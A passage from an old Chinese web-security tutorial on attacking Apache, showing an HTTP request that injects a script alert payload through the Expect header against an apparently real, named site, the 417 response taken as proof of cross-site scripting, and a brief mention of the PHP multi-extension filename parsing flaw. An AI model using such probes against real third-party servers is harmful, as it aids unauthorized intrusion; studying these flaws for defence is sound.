Web安全实践(9)攻击apache
2008-11-12 13:33:17 来源:WEB开发网
我们可以看到错误信息中的"Expect:abcd",是我们提交的请求。这时候就该考虑是不是存在跨站的漏洞,继续测试。
发送请求(注意最后的Expect请求):
GET /data_form.php HTTP/1.1
Host: safesurf.china.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip,deflate
Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Expect: <script language="javascript">alert('hello')</script>
得到响应:
HTTP/1.x 417 Expectation Failed
Date: Wed, 12 Nov 2008 01:53:34 GMT
Server: Apache/1.3.29 (Unix) PHP/4.3.4
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
证明该服务器是存在跨站漏洞的。对于跨站攻击我们以后会具体涉及,我也不是很清楚把具体的网址暴露出来是否合适?
9.2php文件名解析漏洞
以.php开头的文件名或者类似index.php.en,index.php.fr等都可以当做PHP解析。这是一个比较老的漏洞,援引网上的一篇文章做一下解释。
- ››安全的Win 8系统减肥攻略
- ››安全度过网站排名的四个时期技巧
- ››web安全之信息刺探防范1
- ››webqq 最新加密算法
- ››webdriver 数据库验证方法
- ››WebSphere Application Server 7.0 XML Feature P...
- ››Web2.0网络时代基于社会影响力的声望值
- ››Web服务器搭建:配置Linux+Apache+Mysql+PHP(或Pe...
- ››安全第一 Windows 7五件应该知道的事
- ››WebLogic调整Java虚拟机性能优化参数
- ››webqq2.0协议研究(3)-ClientId生成
- ››Web.config配置文件
中查找“Web安全实践(9)攻击apache”更多相关内容
中查找“Web安全实践(9)攻击apache”更多相关内容更多精彩
赞助商链接
